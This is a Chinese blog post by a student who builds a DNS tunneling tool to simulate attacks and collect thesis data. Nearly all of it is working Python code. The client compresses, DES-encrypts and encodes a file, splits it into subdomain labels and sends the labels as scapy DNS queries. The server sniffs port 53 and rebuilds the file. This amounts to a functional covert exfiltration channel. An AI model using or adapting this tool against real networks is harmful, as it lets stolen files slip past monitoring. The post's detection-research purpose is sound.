到博主做毕设的时间了,因为博主毕设方向的需要的数据集,很少有公开提供(毕竟DNS的记录多多少少带点隐私问题),所以不得不自己模拟DNS攻击来进行操作。
首先要了解啥是DNS隧道攻击的话,可以看一下咱家之前的博文DNS流量分析领域调研。这边就懒得再写一遍了。在之前的搭建子域DNS服务器和Ubuntu搭建DNS服务器中,已经把大致的环境搭建完成了,这里直接开始隧道攻击程序的记录。
攻击方案
这里希望的是能够通过DNS报文来传输文件。
在客户端方面,存在以下几个模块,分别是文件读入模块,编码模块,嵌入模块和发送模块,在服务器端,有以下模块,分别为报文接收,内容提取,文件恢复模块,在此外,另附一配置模块,用于设置各项参数,如最大报文长度,编码方式等。
控制模块
我使用json文件来实现控制模块,该模块分为两部分,分别为内容,域名格式。如下所示
编码模块
在该模块,我设置了三种选项,分别是是否压缩,是否加密和编码,前两个是可选项,最后一个是必选项。
def content_conversion(set_content,data):
if set_content["compress_or_not"] == 1:
data = compress(data)
#print(data)
if set_content["encrypt_mode"]["active"] == 1:
data = encode_decode.Encrypt(data,set_content["encrypt_mode"]["method"],set_content["encrypt_mode"]["key"])
data = encode_decode.Encode(data,set_content["encode_method"]['method'])
return data
对于压缩,我选择直接调用zlib库来完成
def compress(data):
res = zlib.compress(data,zlib.Z_BEST_COMPRESSION)
return res
def decompress(data):
zobj = zlib.decompressobj()
data = zobj.decompress(data)
#res = data.decode(encoding='utf-8')
return data
而对于加密,可选的有AES加密,DES加密和3DES加密等方法。目前只实现了DES加密。
def des_encrypt( key, plaintext):
iv = secret_key = key
k = pyDes.des(secret_key, pyDes.CBC, iv, pad=None, padmode = pyDes.PAD_PKCS5)
data = k.encrypt(plaintext, padmode=pyDes.PAD_PKCS5)
res=binascii.b2a_hex(data)
return res
def des_decrypt( key, ciphertext):
iv = secret_key = key
k = pyDes.des(secret_key, pyDes.CBC, iv, pad=None, padmode = pyDes.PAD_PKCS5)
data = k.decrypt(binascii.a2b_hex(ciphertext), padmode=pyDes.PAD_PKCS5)
return data
def Encrypt(content,mode,password):
res=''
if mode == "DES":
while len(password)<8:
password=password+password
key = password[:8]
res = des_encrypt(key,content)
return res
def Decrypt(content,mode,password):
res=None
if mode == "DES":
while len(password)<8:
password=password+password
key = password[:8]
res = des_decrypt(key,content)
return res
最后是编码部分,常见的编码方法诸如Base32,Base16和Base64_URL等编码方法。
def Encode(inf, ch='base32'):
rnt=''
if ch == 'base32':
rnt = base64.b32encode(inf)
if ch == 'base16':
rnt = base64.b16encode(inf)
if ch == 'base64url':
rnt = base64.urlsafe_b64encode(inf)
return rnt
def Decode(inf, ch='base32'):
rnt=''
if ch == 'base32':
rnt = base64.b32decode(inf)
if ch == 'base16':
rnt = base64.b16decode(inf)
if ch == 'base64url':
rnt = base64.urlsafe_b64decode(inf)
return rnt
信息嵌入
在信息嵌入阶段,需要将信息分块处理,再加上其他的伪装项。
def make_domain(format,SLD='test.com',inf=None,max_label=63,seq_number=0,tot_seq_number=0,guid_name='test_str',
file_name='test_name',file_type='txt'):
labels=format.split('.')
content={'system_ID','file_name','seq_number','rand','target_content','tot_seq_number','GUID',}
subdomain=''
l=''
for label in labels:
l=''
label0s=label.split('<')
for label0 in label0s:
label1s=label0.split('>')
for label1 in label1s:
if label1 not in content:
l=l+label1
continue
if label1 =='GUID':
l=l+uuid.uuid3(uuid.NAMESPACE_DNS,guid_name).hex
continue
if label1 == 'target_content' and inf != None:
l=l+inf
continue
if label1 == 'file_name':
l=l+file_name
continue
if label1 == 'seq_number':
l=l+str(seq_number)
continue
if label1 == 'rand':
Randint=random.randint(1,max_label)
Randstr=''.join(random.sample(string.ascii_letters + string.digits, Randint))
l=l+Randstr
if label1 == 'tot_seq_number':
l = l + str(tot_seq_number)
if label1 == 'system_ID':
l = l + uuid.uuid1().hex
if label1 == 'file_type':
l = l + file_type
if len(l)>max_label:
print("ERROR: Label",label," Size is larger than MAX_LABEL SIZE", max_label)
#return None
subdomain = subdomain + l + '.'
domain = subdomain + SLD
if (len(domain)>253):
print("ERROR: Size of Domain is larger than 253")
#return None
return domain
发送模块
我选择使用scapy来完成信息的发送,用scapy可以非常轻松,明确的构造包并进行发送,且不用理会应答包。
from scapy.all import *
def dns_request(Domain,Dst,Dst_port=53):
a = IP(dst=Dst)
b = UDP(dport = Dst_port)
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd = DNSQR(qname=Domain,qtype='A',qclass=1)
p = a/b/c
send(p)
接收报文
可以直接使用scapy的sniff函数来实时嗅探包,并对每个包进行实时操作
sniff(prn=cap, filter='udp and udp port 53')
信息提取
我仅提取嵌入信息,这里不对其余辅助信息部分进行处理。提取出的信息保存到一个字典中。
def cap(packet):
a = packet.summary()
layers = a.split('/')
DNS = layers[len(layers) - 1]
fields = DNS.split(' ')
DNSQR = None
for i in range(len(fields)):
if (fields[i] == 'Qry'):
DNSQR = fields[i + 1]
break
if DNSQR == None:
return
Domain = DNSQR.lstrip('\"b\'').rstrip('\'\"')
if set_options["domain_structure"]["SLD"] not in Domain:
return
content = split_domain(Domain, set_options['domain_structure']['format'])
if set_options["content"]["encode_method"]['active'] == 1:
content = Decode(content, set_options["content"]["encode_method"]['method']).decode()
print(content)
options = content.split('|!|')
# print(len(options),options)
if len(options) == 4 and options[2] == 'REG':
# print(content)
jobid = options[0]
file_name = options[1]
checksum = options[3]
packets_dict[jobid] = {'filename': file_name.replace('_', '.'), 'checksum': checksum, 'contents': []}
elif len(options) == 3 and options[2] == 'DONE':
mkdir(packets_dict[options[0]], set_options)
elif len(options) == 3:
packets_dict[options[0]]['contents'].append([options[0], int(options[1]), options[2]])
文件重构
对文件的重构,我通过jobid来确认是哪个文件
filename = job['filename']
checksum = job['checksum']
contents = job['contents']
contents.sort(reverse = False,key=lambda x:x[1])
ct=0
Data=''
set_encode=set_options['content']["encode_method"]
#print(job['contents'])
for content in contents:
tmp=content[2].replace('\n','')
if int(content[1])>ct+1:
print('[ERROR] %s lose pocket %d .'%(content[0],ct+1))
return
if int(content[1])<ct+1:
continue
Data=Data+tmp
ct = int(content[1])
if (hash_md5(Data)!=checksum):
print("[Error] There is something wrong in the data")
return
Data = de_content_conversion(Data, set_options['content'])
print('[OK] %s is Done.'%(content[0]))
f_out = open(filename, 'wb')
f_out.write(Data.encode())
f_out.close()